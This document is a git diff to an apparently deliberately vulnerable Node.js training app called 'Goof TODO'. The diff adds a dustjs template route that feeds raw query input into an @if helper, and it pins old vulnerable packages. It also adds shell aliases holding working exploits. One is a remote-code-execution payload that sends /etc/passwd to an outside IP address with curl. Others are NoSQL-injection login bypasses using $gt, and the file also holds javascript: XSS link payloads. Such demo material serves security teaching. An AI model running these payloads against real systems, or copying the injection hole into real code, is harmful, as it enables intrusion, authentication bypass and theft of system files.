diff --git a/app.js b/app.js
index 66983bec9c..92c4282cd9 100644
--- a/app.js
+++ b/app.js
@@ -10,7 +10,7 @@ var crypto = require('crypto');
var express = require('express');
var http = require('http');
var path = require('path');
-var engine = require('ejs-locals');
+var ejsEngine = require('ejs-locals');
var cookieParser = require('cookie-parser');
var bodyParser = require('body-parser');
var methodOverride = require('method-override');
@@ -19,13 +19,18 @@ var errorHandler = require('errorhandler');
var optional = require('optional');
var marked = require('marked');
var fileUpload = require('express-fileupload');
+var dust = require('dustjs-linkedin');
+var dustHelpers = require('dustjs-helpers');
+var cons = require('consolidate');
var app = express();
var routes = require('./routes');
// all environments
app.set('port', process.env.PORT || 3001);
-app.engine('ejs', engine);
+app.engine('ejs', ejsEngine);
+app.engine('dust', cons.dust);
+cons.dust.helpers = dustHelpers;
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
app.use(logger('dev'));
@@ -45,6 +50,7 @@ app.get('/destroy/:id', routes.destroy);
app.get('/edit/:id', routes.edit);
app.post('/update/:id', routes.update);
app.post('/import', routes.import);
+app.get('/about_new', routes.about_new);
// Static
app.use(st({path: './public', url: '/public'}));
diff --git a/exploits/dustjs-exploits.sh b/exploits/dustjs-exploits.sh
new file mode 100644
index 0000000000..d3987e1653
--- /dev/null
+++ b/exploits/dustjs-exploits.sh
@@ -0,0 +1,17 @@
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
+# Simple request
+alias dust1="curl $GOOF_HOST'/about_new?device=Desktop'"
+
+# Request with array
+alias dust2="curl $GOOF_HOST'/about_new?device\[\]=Desktop'"
+
+# Trigger error
+alias dust3="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27'"
+
+# Simple RCE, logs to console
+alias dust4="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-console.log(%27FrontendConf%20Was%20Here%27)-%27'"
+
+alias dust5="curl $GOOF_HOST'/about_new?device\[\]=Desktop%27-require(%27child_process%27).exec(%27curl%20-m%203%20-F%20%22x%3D%60cat%20%2Fetc%2Fpasswd%60%22%20http%3A%2F%2F34.205.135.170%2F%27)-%27'"
diff --git a/exploits/exploit-aliases.sh b/exploits/exploit-aliases.sh
index 50478c10b4..07d8444ac6 100755
--- a/exploits/exploit-aliases.sh
+++ b/exploits/exploit-aliases.sh
@@ -3,3 +3,5 @@
source mongoose-exploits.sh
source st-exploits.sh
source ms-exploits.sh
+source nosql-exploits.sh
+source dustjs-exploits.sh
diff --git a/exploits/marked-exploit.sh b/exploits/marked-exploit.sh
index f435e3ad08..d698420acf 100644
--- a/exploits/marked-exploit.sh
+++ b/exploits/marked-exploit.sh
@@ -10,10 +10,10 @@ This is **markdown**
# Failed XSS
[Gotcha](javascript:alert(1))
-# Successfull XSS using vuln
+# Failed XSS despite URL encoding
[Gotcha](javascript:alert(1))
-# Successfull XSS using vuln
+# Successfull XSS using vuln and browser interpretation
[Gotcha](javascript:this;alert(1))
# Most boasty exploit
diff --git a/exploits/nosql-exploits.sh b/exploits/nosql-exploits.sh
new file mode 100644
index 0000000000..432abfc39c
--- /dev/null
+++ b/exploits/nosql-exploits.sh
@@ -0,0 +1,20 @@
+
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
+# Default working case - form fill
+alias ns1="echo -n 'username=admin&password=SuperSecretPassword' | http --form $GOOF_HOST/admin -v"
+
+# JSON working login
+alias ns2='echo '"'"'{"username":"admin", "password":"SuperSecretPassword"}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# failed login
+alias ns3='echo '"'"'{"username":"admin", "password":"WrongPassword"}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# successful login, NOSQL Injection, knowing the username
+alias ns4='echo '"'"'{"username": "admin", "password": {"$gt": ""}}'"'"' | http --json $GOOF_HOST/admin -v'
+
+# successful login, NOSQL Injection, without knowing the username
+alias ns5='echo '"'"'{"username": {"$gt": ""}, "password": {"$gt": ""}}'"'"' | http --json $GOOF_HOST/admin -v'
+
diff --git a/exploits/nosql-injection.sh b/exploits/nosql-injection.sh
deleted file mode 100644
index 74b77a6e2b..0000000000
--- a/exploits/nosql-injection.sh
+++ /dev/null
@@ -1,9 +0,0 @@
-
-echo -n 'username=admin&password=SuperSecretPassword' | http --form http://localhost:3001/admin -v
-
-echo '{"username":"admin", "password":"SuperSecretPassword"}' | http --json http://localhost:3001/admin -v
-
-echo '{"username": {"$gt": ""}, "password": {"$gt": ""}}' | http --json http://localhost:3001/admin -v
-
-echo '{"username": "admin", "password": {"$gt": ""}}' | http --json http://localhost:3001/admin -v
-
diff --git a/package.json b/package.json
index 087260e07a..f367c6babc 100644
--- a/package.json
+++ b/package.json
@@ -16,6 +16,9 @@
"body-parser": "1.9.0",
"cfenv": "^1.0.4",
"cookie-parser": "1.3.3",
+ "consolidate": "0.14.5",
+ "dustjs-linkedin": "2.5.0",
+ "dustjs-helpers": "1.5.0",
"ejs": "1.0.0",
"ejs-locals": "1.0.2",
"errorhandler": "1.2.0",
diff --git a/routes/index.js b/routes/index.js
index 49908bb42b..d0c3b0f41f 100644
--- a/routes/index.js
+++ b/routes/index.js
@@ -194,3 +194,13 @@ exports.import = function (req, res, next) {
res.redirect('/');
};
+
+exports.about_new = function (req, res, next) {
+ console.log(JSON.stringify(req.query));
+ return res.render("about_new.dust",
+ {
+ title: 'Goof TODO',
+ subhead: 'Vulnerabilities at their best',
+ device: req.query.device
+ });
+};
diff --git a/views/about_new.dust b/views/about_new.dust
new file mode 100644
index 0000000000..b835046fb1
--- /dev/null
+++ b/views/about_new.dust
@@ -0,0 +1,18 @@
+
+
+
+{@if cond="'{device}'=='Desktop'"}
+
+{:else}
+
+{/if}
+
+ {title}
+ {subhead}
+
+ The BESTest todo app evar
+
+ Device string (debug): {device}
+
+
+